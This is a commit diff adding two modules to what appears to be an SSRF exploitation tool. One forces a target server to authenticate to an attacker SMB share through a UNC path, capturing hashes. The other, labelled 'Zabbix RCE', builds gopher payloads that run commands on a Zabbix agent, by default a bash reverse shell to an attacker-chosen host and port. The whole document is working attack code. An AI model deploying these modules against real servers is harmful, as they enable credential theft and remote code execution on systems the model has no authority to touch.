Add files via upload

errorfiathck · web-flow · commit 2a3674588b47 · 2023-11-14T17:15:27.000+03:30
diff --git a/modules/smbhash.py b/modules/smbhash.py
@@ -0,0 +1,30 @@
+from utils.utils import *
+import logging
+
+# NOTE
+# Use auxiliary/server/capture/smb from Metasploit to setup a listener
+
+name          = "smbhash"
+description   = "Force an SMB authentication attempt by embedding a UNC path (\\SERVER\SHARE) "
+author        = "Swissky"
+documentation = []
+
+class exploit():
+    UNC_EXAMPLE = "\\\\192.168.1.2\\SSRFmap"
+    UNC_IP      = "192.168.1.2"
+    UNC_FILE    = "SSRFmap"
+
+    def __init__(self, requester, args):
+        logging.info(f"Module '{name}' launched !")
+
+        UNC_IP   = input("UNC IP (default: 192.168.1.2): ")
+        if UNC_IP != '':
+            self.UNC_IP = UNC_IP
+
+        UNC_FILE = input("UNC File (default: SSRFmap): ")
+        if UNC_FILE != '':
+            self.UNC_FILE = UNC_FILE
+        
+        payload = wrapper_unc(self.UNC_FILE, self.UNC_IP)
+        r = requester.do_request(args.param, payload)
+        logging.info(f"\033[32mSending UNC Path\033[0m : {payload}")
diff --git a/modules/zabbix.py b/modules/zabbix.py
@@ -0,0 +1,47 @@
+from utils.utils import *
+import logging
+import urllib.parse as urllib
+
+# NOTE
+# Require `EnableRemoteCommands = 1` on the Zabbix service
+
+name          = "zabbix"
+description   = "Zabbix RCE"
+author        = "errorfiathck"
+documentation = []
+
+class exploit():
+    cmd = "bash -i >& /dev/tcp/SERVER_HOST/SERVER_PORT 0>&1"
+
+    def __init__(self, requester, args):
+        logging.info(f"Module '{name}' launched !")
+
+        cmd = input("Give command to execute (Enter for Reverse Shell): ")
+        if cmd == "":
+            if args.lhost == None: 
+                self.cmd = self.cmd.replace("SERVER_HOST", input("Server Host:"))
+            else:
+                self.cmd = self.cmd.replace("SERVER_HOST", args.lhost)
+
+            if args.lport == None: 
+                self.cmd = self.cmd.replace("SERVER_PORT", input("Server Port:"))
+            else:
+                self.cmd = self.cmd.replace("SERVER_PORT", args.lport)
+        else:
+            self.cmd  = cmd
+
+        # Data for the service
+        gen_host = gen_ip_list("127.0.0.1", args.level)
+        for ip in gen_host:
+            port = "10050"
+            self.cmd = urllib.quote_plus(self.cmd).replace("+","%20")
+            self.cmd = self.cmd.replace("%2F","/")
+            self.cmd = self.cmd.replace("%25","%")
+            self.cmd = self.cmd.replace("%3A",":")
+            data = "system.run[(" + self.cmd + ");sleep 2s]"
+            
+            payload = wrapper_gopher(data, ip , port)
+            logging.info(f"Generated payload : {payload}")
+
+            # Send the payload
+            r = requester.do_request(args.param, payload)
